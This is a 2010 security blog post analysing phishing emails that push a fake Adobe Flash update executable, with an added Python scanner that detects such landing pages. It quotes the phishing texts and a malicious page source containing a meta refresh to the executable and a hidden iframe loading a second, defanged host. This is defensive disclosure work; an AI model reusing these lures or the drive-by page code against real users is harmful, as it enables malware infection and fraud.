Adobe Flash malware in what appears as phishing emails
July 23, 2010
MX Lab intercepted emails that look like ordinary phishing emails, but on closer inspection of the included URLs they turn out to be an attempt to install malware on the victim's computer, disguised as an important Adobe Flash Player update.
Online Banking Account Alert
The first example comes from the spoofed email address “Electronic Payments Association <buttesob62@rowan-glen.com>” with the subject “Online Banking Account Alert!” and this is the body of the email:
You must submit verification documents to continue using your account without interruption. To view the details of this request and submit the required information, click on the following link (or copy & paste it into your web browser):
hxxp://astroereyna.gr/
We thank you for your assistance in this matter.
When visiting the web site with Firefox we got the message “Sorry, you need to install flash player to see this content…” and our download manager opened to download the file adobe_flash_install.exe. This is the source of the web page:
Sorry, you need to install flash player to see this content... <meta http-equiv="refresh" content="3;url=hxxp://astroereyna.gr/adobe_flash_install.exe" />
<iframe src='hxxp://diamonddoctor.ru:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>
In Safari, however, the site returned an HTML frameset instead of the download. It appears that some browser-dependent JavaScript redirection is active.
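As an added example (not MX Lab's code), the following Python script parses a captured landing page and flags the three things visible in the page source above: the fake Flash Player prompt, a meta refresh that hands the browser an executable, and a 1x1 hidden iframe pointing at a second host. The sample input is the source quoted above with the wrapped URL joined and the hxxp defanging kept; the indicator names, the extension list and the verdict rule are my own assumptions.

```python
"""Scan a captured landing page for the drive-by tricks seen in the post.

Added example, not code from MX Lab.  The sample page below is the source
quoted in the post (URLs kept defanged as hxxp); everything else is assumed.
"""
import re
from html.parser import HTMLParser

# Constructed sample input: the landing page source from the post.
SAMPLE_PAGE = """Sorry, you need to install flash player to see this content...
<meta http-equiv="refresh" content="3;url=hxxp://astroereyna.gr/adobe_flash_install.exe" />
<iframe src='hxxp://diamonddoctor.ru:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>
"""

# Extensions a browser would hand straight to the download manager (assumed list).
EXECUTABLE_EXT = (".exe", ".scr", ".msi", ".com", ".pif", ".bat")
LURE_RE = re.compile(r"install\s+(adobe\s+)?flash\s*player", re.I)
REFRESH_URL_RE = re.compile(r"url\s*=\s*['\"]?([^'\"]+)", re.I)


def _px(value):
    """Pixel size from a width/height attribute; huge when absent or unparseable."""
    digits = re.sub(r"\D", "", value or "")
    return int(digits) if digits else 10**6


class LandingPageScanner(HTMLParser):
    """Collects (indicator, detail) pairs while parsing."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_URL_RE.search(a.get("content", ""))
            if m:
                target = m.group(1).strip()
                kind = ("meta_refresh_to_executable"
                        if target.lower().endswith(EXECUTABLE_EXT) else "meta_refresh")
                self.findings.append((kind, target))
        elif tag == "iframe":
            # Hidden either by size (1x1 or smaller) or by inline style.
            style = a.get("style", "").replace(" ", "").lower()
            tiny = _px(a.get("width")) <= 1 and _px(a.get("height")) <= 1
            if tiny or "visibility:hidden" in style or "display:none" in style:
                self.findings.append(("hidden_iframe", a.get("src", "")))

    def handle_data(self, data):
        # The social-engineering text that justifies the download prompt.
        if LURE_RE.search(data):
            self.findings.append(("flash_update_lure", data.strip()))


def scan_landing_page(html):
    """Return the list of (indicator, detail) pairs found in one page's HTML."""
    p = LandingPageScanner()
    p.feed(html)
    p.close()
    return p.findings


def is_drive_by(findings):
    """Verdict: an executable pushed via meta refresh, or an injected hidden frame."""
    kinds = {k for k, _ in findings}
    return "meta_refresh_to_executable" in kinds or "hidden_iframe" in kinds


if __name__ == "__main__":
    found = scan_landing_page(SAMPLE_PAGE)
    for kind, detail in found:
        print(f"{kind:28} {detail}")
    print("drive-by:", is_drive_by(found))
```

The hidden iframe is the part worth keeping an eye on: even a user who refuses the fake update still loads the second host in the background, so the scanner treats the frame alone as enough for a positive verdict.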
An unauthorized transaction billed from your bank account
The second example comes from the spoofed address “Electronic Payments Association <euphemismm215@reagirona.com>”, has the subject “An unauthorized transaction billed from your bank account” and this is the body of the email:
Dear bank account holder,
The ACH transaction, recently initiated from your bank account, was rejected by the Electronic Payments Association. Please review the transaction report by clicking the link below:
Unauthorized ACH Transaction Report
——————————————————————
Copyright ©2010 by NACHA – The Electronic Payments Association
The text “Unauthorized ACH Transaction Report” links to a fast-flux domain. Following the link brings up the following screen in the browser, together with a download of the file adobe_flash_install.exe, as in the first example.

At the time of writing, none of the AV engines at VirusTotal detected the threat. VirusTotal permalink and MD5: 97732f717f50c38714a3f9c8d8c6274a.
